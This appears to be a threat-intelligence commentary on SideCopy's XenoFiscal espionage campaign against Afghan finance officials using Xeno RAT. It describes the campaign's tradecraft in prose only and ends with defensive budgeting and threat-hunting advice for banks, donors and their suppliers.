A Pakistan-aligned threat cluster tracked as SideCopy, a subgroup of Transparent Tribe (APT36), has been running a sustained espionage campaign against Afghanistan's Ministry of Finance and provincial government employees since at least May 2025, according to Seqrite researchers whose findings were reported by Dark Reading on June 4. The operation, dubbed XenoFiscal, leans on Xeno RAT, an open-source remote access trojan that has become a staple of the regional cyber-espionage scene. The campaign uses standard tradecraft: spear-phishing lures themed around budgets, payroll, and inter-ministerial correspondence, ZIP archives containing malicious LNK files disguised as PDFs, and staged delivery through mshta-fetched HTA payloads decoded in memory. Once installed, Xeno RAT delivers remote shell, file exfiltration, keystroke capture, and the ability to chain in additional payloads.
What makes XenoFiscal worth the attention of defenders well outside Kabul is not the malware. Xeno RAT is freely available on GitHub. The interesting parts are the decoy, the infrastructure, and the operational discipline. Seqrite documented a decoy document containing a staff directory of Afghan Ministry of Finance employees, with names and mobile numbers of high-ranking officials across all 34 provinces. LNK filenames and lures were written in Pashto, the language native to the Pashtun population from which the Taliban draws its base, signaling a targeting layer that goes beyond casting a wide net.
Infrastructure abuse inside a sovereign IP block
The most notable evasion choice was the C2 hosting. The attackers placed their remote payload on a compromised domain inside the IP address space of Afghanistan's Ministry of Communication and Information Technology, sitting alongside more than 200 legitimate government and education sites. Outbound traffic from a finance ministry workstation to a ministry of communications subnet looks, to almost any defender, like normal interagency business. Persistence on host was implemented through a Windows registry run key masquerading as a Microsoft Edge process, and the final Xeno RAT build carried a hardcoded C2 pointing at a bulletproof hosting provider in Bulgaria.
Seqrite's own framing is worth quoting directly. "While the operation does not introduce new malware techniques, it demonstrates a mature and deliberate approach to defense evasion, persistence, and operational security," the researchers wrote. "The sophistication lies more in the execution, targeting, and orchestration of proven methods than in any single technical innovation." That is the part operators outside the region should internalize. Modern state-aligned activity increasingly looks like good project management around commodity components, not exotic zero-days.
Why Kabul's defenses make commodity malware enough
The strategic story matters as much as the technical one. Afghanistan's public sector has been a high-value target for regional intelligence services since the Taliban takeover in 2021. The digital infrastructure now defended by the Taliban, mobile networks, fiber backbones, biometric databases, ministry portals, was largely built between 2001 and 2021 with foreign aid money. The current government inherited that footprint without inheriting the budgets, vendor relationships, or trained staff that kept it patched. Seqrite notes that Afghanistan's cyber resilience faces structural pressure from economic isolation, limited access to international cybersecurity partnerships, difficulty retaining skilled personnel, and constraints on technology modernization. In that environment, an attacker does not need a custom implant. A maintained fork of an open-source RAT is sufficient to collect months of financial planning data, donor flows, and currency reserve movements.
Afghan defenders are working with a sparse toolset. Patch cadence on Windows endpoints is slow, EDR coverage is limited, email security gateways are often legacy or absent, and visibility into outbound traffic is minimal. None of those gaps are unique to Kabul. They describe the security posture of mid-sized public sector bodies and NGOs across most of South and Central Asia, and a meaningful share of the partner ecosystem that multinational banks, donors, and humanitarian logistics providers rely on every day.
Spillover risk for banks, donors, and logistics partners
For CTOs and VPEs outside the immediate target set, the relevance is twofold. First, commodity RATs that mature inside state campaigns rarely stay there. Xeno RAT has already been seen in financially motivated intrusions across South Asia and the Gulf, and the toolchain typically diffuses into criminal markets within a quarter or two of state use. Detection content built today against Xeno RAT loaders, registry persistence keys disguised as browser processes, mshta-staged HTA execution chains, and C2 patterns that abuse trusted neighbor infrastructure will pay off when the same code base shows up inside an MSP compromise affecting one of our suppliers. Second, the targeting pattern intersects directly with the partner ecosystems of multinational banks, payment processors, donor-funded programs, and humanitarian logistics providers. Compromise of a finance ministry is also, in practice, compromise of every counterparty that exchanges payment files or budget projections with it.
There is also a procurement signal here that boards should not miss. Bulletproof hosting in Bulgaria, compromised domains inside a sovereign IP block, and Pashto-language lure crafting all cost money. Not much, but enough that the operators are paying for capability rather than improvising. Pakistan-Afghanistan hostilities have escalated through 2025, and intelligence collection on Kabul's fiscal position, including donor disbursement schedules and reserve movements, has obvious value for any neighbor weighing economic pressure or border policy.
What we are telling clients to fund this quarter
Bruno Digital's read for our clients: stop treating commodity RAT detections as low-severity noise. We are advising security and platform leaders to do four concrete things this quarter. First, fund a focused threat-hunting sprint against open-source RAT families, Xeno RAT, AsyncRAT, Quasar, DcRAT, with hunt queries built from current SideCopy and Transparent Tribe reporting. Second, instrument outbound traffic to detect C2 hosted on trusted neighbor infrastructure, not just on known bad IPs; geographic and ASN co-location with legitimate partners is now a tradecraft signal, not a false-positive driver. Third, require third-party risk reviews for any vendor with operations in South Asia or the Gulf to attest to EDR coverage and LNK and HTA execution controls, and price the contract accordingly when they cannot. Fourth, allocate budget, we recommend a floor of 50,000 to 150,000 dollars per critical supplier tier, to fund EDR licensing and managed detection for partners that handle payment files or identity data on our behalf. The cheapest way to keep Xeno RAT out of our network is to pay for it to stay out of theirs.
The threshold to watch is the next quarterly threat report from Seqrite, CrowdStrike, or Mandiant covering Q3 2026. If Xeno RAT detections in commercial enterprise telemetry climb past the diffusion pattern we saw with AsyncRAT in 2023, where state use preceded criminal adoption by roughly six months, expect the same RAT, the same loaders, and the same C2 tradecraft to land inside Western financial supply chains by year end. If those detections stay flat, SideCopy has kept tooling discipline tighter than its peers and the urgency drops a notch. Either outcome is actionable. Pretending the distinction between state and criminal tradecraft still holds is not.
